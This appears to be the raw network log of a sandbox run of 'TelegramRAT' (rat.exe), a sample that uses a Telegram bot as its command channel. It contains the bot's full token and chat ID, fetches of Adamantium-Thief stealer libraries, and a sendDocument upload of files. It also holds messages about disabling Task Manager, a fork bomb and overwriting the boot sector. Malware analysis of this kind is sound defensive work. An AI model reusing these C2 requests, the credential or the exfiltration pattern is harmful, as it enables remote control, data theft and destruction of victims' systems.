GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506670

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506671

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506672

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506673

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506674

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506675

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506676

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506677

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506678

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506679

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506680

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506681

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506682

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506683

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506684

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506685

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506686

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506687

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506688

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506689

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506690

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506691

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506692

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661

HTTP Response

200
104.17.150.117:443

https://www.mediafire.com/file/8f08iikhf17syhu/TelegramRAT.exe/file

tls, http

rat.exe

995 B
16.2kB
13
17

HTTP Request

GET https://www.mediafire.com/file/8f08iikhf17syhu/TelegramRAT.exe/file

HTTP Response

403
142.250.187.196:443

https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGKTKjrwGIjBc2JoKtgkKs-xX2e46nUBGZDqj1vhYZfm9iFvYgcd4qxg8Wqjmw2CJCpGPL_4nh48yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

tls, http2

chrome.exe

3.4kB
17.4kB
35
43

HTTP Request

GET https://www.google.com/async/ddljson?async=ntp:2

HTTP Request

GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

HTTP Request

GET https://www.google.com/async/newtab_promos

HTTP Request

GET https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS117BTGKTKjrwGIjASY0reHbChnZ8b3wbMiYVNhHjLQSR3CyOsHLWoxxYpTTdMCDzFbmK4SdIfImrMLfAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

HTTP Request

GET https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGKTKjrwGIjBc2JoKtgkKs-xX2e46nUBGZDqj1vhYZfm9iFvYgcd4qxg8Wqjmw2CJCpGPL_4nh48yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
142.250.187.238:443

https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D97%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D97%2526e%253D1

tls, http2

chrome.exe

3.5kB
11.1kB
20
19

HTTP Request

GET https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D97%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D97%2526e%253D1
142.250.200.33:443

https://clients2.googleusercontent.com/crx/blobs/AcmIXbpGoRruM6Rg2pdHIUfNGnvAwJcqpFoWJV4Xd6PeYFnv5YpJ0-GVzjWL6XpCDzrg9cVo2bTwfPVau85UdyeFfZQe-rOdS7oyguq-391NmfeQd9WZZkjpgIbL1I5KKEcAxlKa5Z8JDrufy52udyO9TokqhOw4Sbnj/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx

tls, http2

chrome.exe

5.0kB
173.3kB
83
133

HTTP Request

GET https://clients2.googleusercontent.com/crx/blobs/AcmIXbpGoRruM6Rg2pdHIUfNGnvAwJcqpFoWJV4Xd6PeYFnv5YpJ0-GVzjWL6XpCDzrg9cVo2bTwfPVau85UdyeFfZQe-rOdS7oyguq-391NmfeQd9WZZkjpgIbL1I5KKEcAxlKa5Z8JDrufy52udyO9TokqhOw4Sbnj/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx
185.199.111.133:443

https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libsodium-64.dll

tls, http

rat.exe

18.0kB
995.8kB
375
727

HTTP Request

GET https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/Sodium.dll

HTTP Response

200

HTTP Request

GET https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libsodium.dll

HTTP Response

200

HTTP Request

GET https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libsodium-64.dll

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%92%8A%20Warning!%20System%20will%20be%20destroyed!%20Run%20command%20/OverwriteBootSector_CONFIRM%20to%20continue.

tls, http

rat.exe

24.4kB
57.8kB
205
117

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%93%83%20Uploading%20file...

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506666

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506667

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506668

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506669

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506670

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%E2%9D%8E%20Taskmanager%20disabled

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%E2%9C%85%20Taskmanager%20enabled

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506666

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506667

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506668

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506669

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506670

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%9A%A8%20Preparing%20ForkBomb...

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506666

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506667

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506668

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506669

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506670

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506671

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506672

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506673

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506674

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506675

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506676

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506677

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506678

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506679

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506680

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506681

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506682

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506683

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506684

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506685

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506686

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506687

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506688

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506689

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506690

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506691

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506692

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%92%8A%20Warning!%20System%20will%20be%20destroyed!%20Run%20command%20/OverwriteBootSector_CONFIRM%20to%20continue.

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendDocument?chat_id=-4791200354

tls, http

rat.exe

2.5kB
7.3kB
12
14

HTTP Request

POST https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendDocument?chat_id=-4791200354

HTTP Response

200
149.154.167.220:443

api.telegram.org

tls

14.2kB
35.0kB
121
82

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

58.55.71.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

58.55.71.13.in-addr.arpa
8.8.8.8:53

80.14.97.104.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

80.14.97.104.in-addr.arpa
8.8.8.8:53

134.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

134.32.126.40.in-addr.arpa
8.8.8.8:53

google.com

dns

rat.exe

56 B
72 B
1
1

DNS Request

google.com

DNS Response

142.250.180.14
8.8.8.8:53

api.telegram.org

dns

rat.exe

62 B
78 B
1
1

DNS Request

api.telegram.org

DNS Response

149.154.167.220
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
